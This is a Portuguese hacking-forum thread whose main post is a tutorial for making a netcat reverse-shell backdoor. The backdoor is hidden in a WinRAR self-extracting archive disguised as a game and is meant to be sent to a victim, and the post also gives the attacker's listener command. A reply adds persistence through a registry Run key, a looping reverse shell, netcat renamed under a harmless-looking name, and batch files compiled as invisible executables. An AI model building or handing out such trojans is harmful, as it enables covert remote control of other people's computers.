Netcat - Criando um simples Backdoor

[rahackzin]

::: Introdução :::

O Netcat é uma ferramenta muito cobiçada. Ele pode ser utilizado desde simples funções de telnet, até um backdoor de conexão reversa. Por estas diversas funções, é conhecido também como um "Canivete Suiço" hacker. Na maioria dos sistemas operacionais Linux, o Netcat já vem incluso.
Tendo criatividade, pode-se utilizá-lo como diversas técnicas, entre elas um sniffer e até um brute force!
Nesta matéria iremos criar um backdoor de conexão reversa, que nos dará acesso à shell, ou seja, o cmd.exe! Também configuraremos um arquivo SFX, o qual conterá o netcat e o comando após a execução, que será mandado para a vítima como se fosse um servidor.

::: Ferramentas Necessárias :::

Para a matéria serão necessárias as seguintes ferramentas:

Netcat: http://joncraton.org/files/nc111nt.zip
Winrar: http://www.baixaki.com.br/download/WinRAR.htm

::: Instalando o Netcat :::

Para instalar o Netcat, basta extrair os arquivos para a pasta C:\Windows\System32\
Para chamá-lo, basta ir ao cmd e digitar nc + os comandos

::: O Servidor :::

Após você ter baixado e instalado as ferramentas necessárias, vamos criar o arquivo SFX, o nosso servidor.
Para isto, selecione o arquivo nc.exe, e com o botão direito do mouse, clique em Adicionar para o arquivo...



Em Nome do arquivo, escolha um nome para o arquivo (sem tirar a extensão), no meu caso coloquei "Game". Depois no canto inferioro direito, marque a opção Criar arquivo SFX.



Depois, na aba Avançado clique em Opções SFX...



Irá abrir a janela Opções avançadas do SFX. Na aba Geral siga os seguintes procedimentos. No campo de texto Caminho para extração digite C:\Windows\System32\ que é o diretório para instalar o netcat. Depois, no campo de texto Executar após a extração digite:
nc -d 127.0.0.1 999 -e cmd.exe
Agora vamos explicar...
O comando -d fará o netcat rodar em modo background
Onde eu coloquei 127.0.0.1 você deverá colocar seu ip
O 999 é a porta utilizada, que poderá ser a sua escolha
O comando -e cmd.exe fará executar o cmd.exe ao ser executado... ou seja, você oberá a shell da vítima.



Na aba Métodos marque a opção Ocultar tudo



Depois, na aba Atualizar em Método de atualização marque Extrair e substituir arquivos. Mais embaixo, em Métodos de substituição marque a opção Substituir todos os arquivos



Agora podemos personalizar um pouco nosso servidor. Para isto iremos modificar o ícone... Na aba Texto e Ícone em cima do campo de texto Carregar ícone SFX do arquivo clique no botão Procurar para procurar o ícone. No meu caso utilizarei um dado :)



Agora que terminamos de configurar o SFX podemos clicar no OK para aplicarmos as configurações e novamente em OK para criarmos o arquivo!
Podem ver no desktop que foi criado o arquivo Game.sfx!

Pronto, temos o servidor pronto!


::: Cliente :::

Agora que nosso servidor está pronto, temos que deixar o Netcat em escuta na porta que escolhemos no servidor. No meu caso foi a porta 999.
Para isto, devemos abrir o cmd, e digitar:
nc -L -n -p 999 -vv
Vamos explicar agora o código!
O comando -L irá entrar em modo de escuta, e se a conexão encerrar, tentará reconectar.
O comando -n determina que pode ser utilizado apenas números.
O -p 999 é para determinar a porta.
O -vv é para preparar a conexao quando fexada.

Depois de deixar o netcat em modo de escuta na porta 999 irá aparecer a seguinte mensagem:
Listenning on [any] 999...
Abaixo tem a imagem demonstrando.


Feito isso, você pode enviar para a vítima o arquivo SFX, e então terá acesso ao cmd dela :)

::: Conclusão :::

Nesta matéria vocês aprenderam como criar um simples backdoor de conexão reversa utilizando o Netcat. Devo lembrar, que como ele utiliza conexão reversa deverá ser necessário abrir a porta que será utilizada, em seu roteador, ou modem. Esta foi apenas uma demonstração de uma das muitas funções desta incrivel ferramenta que é o Netcat! A matéria foi utilizada em um Windows, mas tem como fazer backdoor's para Linux também utilizando o Netcat.
Criei esta matéria com o intuíto de ensinar, e não de estimular qualquer ação!
Bem, espero que vocês tenham gostado!

Autor: Rahackzin

[OnlyOne]

fiquei tao emocionado que acho q vc merece um bjo na bunda !

habla serio ...

[b4rt]

Vlw otimo tuto

[guioximitsu]

Mesmo sendo uma técnica meio antiga, que nem funciona mais em sistemas atualizados, valeu o post, pois ela ainda pode servir, se pessoas que forem usar usem criatividade a mais :D :D :D

[Struck]

Boa iniciativa mais eu fiquei tenso quando li isso (já perdi a conta de ver esse "tutorial ráquer").  :-X

[d3lf0]

legal, bem interessante  :)

[Imoogi]

1º - isso só var dar acesso na hora se desconecar ja era, se vc quiser se conectar de novo não da mais!!
2º - e se a pasta do windows não estiver no C?
________________

eu fiz o seguinte:
fiz um bat chamado updte, assim.

Código Selecionar Expandir


@echo off
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Wins /f /t REG_SZ /d "%windir%\winst.exe -autorun"
del updte.exe


"winst.exe" no final da chave é o nome de outro bat com o seguinte codigo

Código Selecionar Expandir


@echo off
title winsist
:loop
winsist nº-do-seu-ip porta -e cmd.exe
cls
goto loop


mudei o nome do nc para winsist
compilei os bats com o BatToExeConverter marcando a opção para deixar invisivel

Opções avançadas do SFX, no campo de texto caminho para extração coloquei %windir%
no campo de texto executar após a extração coloquei updte.exe

%windir% é uma variavel de ambiente do windows que indica o pasta do windows



Assim toda vez que a vitima ligar o pc vai rodar o "winst.exe" que é o bat compilado
ai é so você deixar o nc em escuta no seu pc e pronto
se você se desconectar não tem problema o "winst.exe" vai continuar rodando, ai é só se conectar denovo
você pode se conectar a qualquer hora.

[black pirate]

muito bom

[mH_]

muito obrigado !